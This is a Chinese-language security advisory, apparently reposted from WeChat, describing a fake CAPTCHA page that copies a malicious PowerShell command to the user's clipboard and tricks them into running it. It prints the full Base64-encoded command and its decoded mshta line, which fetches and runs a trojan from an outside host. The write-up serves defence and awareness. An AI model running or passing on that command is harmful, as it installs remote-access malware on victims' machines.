我们团队发现了一种网络安全威胁,它利用用户对CAPTCHA验证过程的信任。
一个假冒的CAPTCHA网页,antibotx.b-cdn[.]net/captcha-verify.html,诱骗用户运行一个恶意的PowerShell脚本,该脚本下载并执行恶意软件。
这种攻击利用了流行的“我不是机器人”CAPTCHA,导致用户无意中通过运行恶意命令来危及他们的系统。
这种攻击方法特别阴险,因为它需要用户交互,并依赖于内置的Windows功能。
由于命令是通过用户的操作系统直接执行的,传统的防病毒程序更难检测到恶意行为。
工作原理:
攻击始于用户访问一个不安全的网页,这些网页很可能包含不安全的第三方广告。
这些广告可能会将用户重定向到一个恶意的CAPTCHA页面。假冒的CAPTCHA看起来合法,并包括一个“我不是机器人”按钮,这在许多需要人类验证的网站上很常见。
然而,点击这个按钮时,网页会秘密地将一个PowerShell命令复制到用户的剪贴板。
攻击的下一阶段开始于假冒CAPTCHA提示用户通过按Windows + R打开运行命令。
然后,用户被指示将剪贴板内容(已经被恶意命令替换)粘贴并按回车。
这个动作触发了PowerShell命令的执行,最终下载并运行一个名为trans08.exe的恶意文件。
复制到用户剪贴板的命令是一个Base64编码的字符串,隐藏了恶意指令。
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgBhADAAOAAiAA==
这个命令看起来具有欺骗性,因为字符串是用Base64编码的,这是一种将二进制数据转换为可读文本以便于传输的技术。
Base64编码的字符串隐藏了以下真实命令:
mshta "https://clicktogo[.]click/downloads/tra08"
mshta实用程序用于运行Microsoft HTML应用程序(HTA),但在这种情况下,它被滥用来下载恶意软件。
值得一提的是,上述文件是一个特洛伊木马,允许攻击者控制受感染的机器或从用户的系统中窃取敏感数据。
一旦下载,trans08.exe文件表现得像一个特洛伊木马,试图重新连接到其命令和控制(C2)服务器并执行其他恶意操作。
恶意软件还使用了一种欺骗技术,冒充微软公司作为其开发者名称。
然而,在分析过程中发现,恶意软件可以检测它是否在受控环境中运行,例如恶意软件沙箱或虚拟机。
如果检测到这样的环境,恶意软件拒绝执行或重新连接到服务器,从而避免被安全研究人员检测到。
此外,可执行文件似乎与旧版本的Windows不兼容。
它不会在运行Windows 7或更早版本的系统上运行,返回错误提示应用程序不是有效的Win32应用程序。
这表明恶意软件针对的是更现代的系统,这可能增加其在未修补或安全性较低的较新Windows版本上的效率。
与其他CAPTCHA诈骗的比较:
这种新型攻击与更常见的与CAPTCHA相关的诈骗有显著不同。
假冒CAPTCHA页面通常用于诱骗用户接受不需要的浏览器推送通知,然后这些通知会用广告或网络钓鱼链接轰炸他们的系统。
然而,这种诈骗更进一步,诱骗用户运行一个PowerShell命令,该命令下载并安装了恶意软件。
在这种攻击中使用PowerShell和剪贴板操作展示了一种更复杂的技术,严重依赖社会工程学。
与传统的恶意软件分发方法(如电子邮件附件或驱动下载)不同,这种方法需要用户的积极参与,使得自动化检测更加困难。
原文始发于微信公众号(独眼情报):人机验证诱骗用户运行危险的PowerShell脚本
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论